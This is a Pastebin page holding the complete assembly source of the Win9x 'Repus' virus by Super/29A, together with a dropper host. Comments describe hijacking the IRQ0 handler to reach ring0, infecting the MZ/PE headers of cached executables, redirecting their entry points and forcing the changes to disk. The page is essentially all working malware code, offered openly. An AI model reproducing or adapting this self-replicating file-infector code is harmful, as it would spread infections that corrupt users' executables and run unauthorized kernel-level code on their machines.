Advertisement
FlyFar

Win9x.Virus.Repus - Source Code

Jun 18th, 2023
883
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 4.26 KB | Cybersecurity | 0 0
  1.  
  2. ;=============;
  3. ; Repus virus ;
  4. ;=============;
  5.  
  6. ;Coded by Super/29A
  7.  
  8. ;VirusSize = 128 bytes !!!
  9.  
  10.  
  11. ;This is the third member of the Repus family
  12.  
  13.  
  14. ;-When an infected file is executed the virus patches IRQ0 handler and waits
  15. ; for it to return control to virus in ring0
  16. ;-Once in ring0, the virus searches in all caches a valid MZheader to infect,
  17. ; modifying EntryPoint (in PEheader) so virus can get control on execution
  18. ;-It will infect no more than one MZheader at a time per file system
  19. ;-MZheader will be overwritten, however windows executes it with no problems
  20. ; (tested under win95,win98,winNT and Win2K)
  21. ;-When executing a non infected file that imports APIs from an infected DLL,
  22. ; virus will get control on DLL inicialization and infect more MZheaders
  23.  
  24.  
  25. ;-------------------------------------------------------------------
  26.  
  27.  .386p
  28.  .model flat,STDCALL
  29.  
  30.  extrn ExitProcess : near
  31.  extrn MessageBoxA : near
  32.  
  33. ;-------------------------------------------------------------------
  34.  
  35. VirusSize = (VirusEnd - VirusStart)
  36.  
  37. VCache_Enum macro
  38.  int 20h
  39.  dw 0009h
  40.  dw 048Bh
  41. endm
  42.  
  43. ;-------------------------------------------------------------------
  44.  
  45. .data
  46.  
  47. Title:
  48.  db 'Super/29A presents...',0
  49.  
  50. Text:
  51.  db 'Repus.'
  52.  db '0' + (VirusSize/100) mod 10
  53.  db '0' + (VirusSize/10) mod 10
  54.  db '0' + (VirusSize/1) mod 10
  55.  db 0
  56.  
  57. ;-------------------------------------------------------------------
  58.  
  59.  
  60. .code
  61.  
  62. ;===================================================================
  63.  
  64. VirusStart:
  65.  
  66.    db 'M'   ; dec ebp
  67.  
  68. VirusEntryPoint:
  69.  
  70.    db 'Z'   ; pop edx
  71.  
  72.    push edx
  73.    dec edx
  74.    jns JumpHost   ; exit if we are running winNT
  75.  
  76.    mov ebx,0C0001100h   ; IRQ0 ring0 handler
  77.  
  78.    mov dl,0C3h
  79.  
  80.    xchg dl,[ebx]   ; hook IRQ0 to get ring0
  81.  
  82. Wait_IRQ0:
  83.  
  84.    cmp esp,edx
  85.    jb Wait_IRQ0
  86.  
  87.  
  88. ;Now we are in ring0
  89.  
  90.  
  91.    xchg dl,[ebx]
  92.  
  93.    lea edx,[eax+(InfectCache-VirusEntryPoint)]   ; EDX = infection routine
  94.  
  95.    fld qword ptr [eax+(Next_FSD-VirusEntryPoint)]   ; save VxD dinamic call
  96.  
  97. Next_FSD:
  98.  
  99.    VCache_Enum   ; enumerate all caches
  100.  
  101.    inc ah
  102.    jnz Next_FSD   ; try next file system
  103.  
  104.    call ebx   ; return control to IRQ0 and return just after the CALL
  105.  
  106.  
  107. ;Now we are in ring3
  108.  
  109.  
  110. JumpHost:
  111.  
  112.    jmp HostEntryPoint   ; return control to host
  113.  
  114. ;-------------------------------------------------------------------
  115.  
  116. InfectCache:
  117.  
  118.    xor dl,dl   ; EDX = ImageBase
  119.  
  120.    mov edi,[esi+10h]   ; EDI = MZheader
  121.  
  122.    movzx ecx,byte ptr [edi+3Ch]
  123.  
  124.    cmp byte ptr [edi+ecx],'P'   ; check for PEheader
  125.    jnz _ret
  126.  
  127. Offset3B:
  128.  
  129.    and eax,00000080h   ; EAX = 0
  130.  
  131.    xchg esi,edx   ; ESI = ImageBase
  132.                   ; EDX = Cache Block Structure
  133.  
  134.    cmpsb   ; check for MZheader
  135.    jnz _ret
  136.  
  137.    mov [esi-1+(Offset3B+1-VirusStart)],ecx   ; save offset of PEheader
  138.  
  139.    fst qword ptr [esi-1+(Next_FSD-VirusStart)]   ; restore VxD dinamic call
  140.  
  141.    inc eax   ; EAX = 1
  142.  
  143.    xchg eax,[edi-1+ecx+28h]   ; set virus EntryPoint
  144.  
  145.    sub eax,(JumpHost+5-VirusStart)
  146.  
  147.    jb _ret   ; jump if its already infected
  148.  
  149.    mov cl,(VirusSize-1)
  150.  
  151.    rep movsb   ; copy virus to MZheader
  152.  
  153.    mov [edi+(JumpHost+1-VirusEnd)],eax   ; fix jump to host
  154.  
  155.  
  156. ;Here we are gonna find the pointer to the pending cache writes
  157.  
  158.  
  159.    mov ch,2
  160.    lea eax,[ecx-0Ch]  ; EAX=1F4h   ;-D
  161.    mov edi,[edx+0Ch]  ; EDI = VRP (Volume Resource Pointer)
  162.    repnz scasd
  163.    jnz _ret  ; not found  :-(
  164.  
  165.    ; EDI = offset in VRP which contains PendingList pointer
  166.  
  167.    cmp [edi],ecx   ; check if there are other pending cache writes
  168.    ja _ret
  169.  
  170.    cmp [edi+30h],ah   ; only infect logical drives C,D,...
  171.    jbe _ret
  172.  
  173.  
  174. ;Now we are gonna insert this cache in the pending cache writes
  175.  
  176.  
  177.    or byte ptr [edx+32h],ah  ; set dirty bit
  178.  
  179.    mov [edx+1Ch],edx  ; set PendingList->Next
  180.    mov [edx+20h],edx  ; set PendingList->Previous
  181.  
  182.    mov [edi],edx  ; set PendingList pointer
  183.  
  184. _ret:
  185.  
  186.    ret
  187.  
  188.    db '29A'
  189.  
  190. VirusEnd:
  191.  
  192. ;===================================================================
  193.  
  194.  db 1000h dup(90h)
  195.  
  196. HostEntryPoint proc near
  197.  
  198.  push 0
  199.  push offset Title
  200.  push offset Text
  201.  push 0
  202.  call MessageBoxA
  203.  
  204.  push 0
  205.  call ExitProcess
  206.  
  207. HostEntryPoint endp
  208.  
  209. ;===================================================================
  210.  
  211. ends
  212. end VirusEntryPoint
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement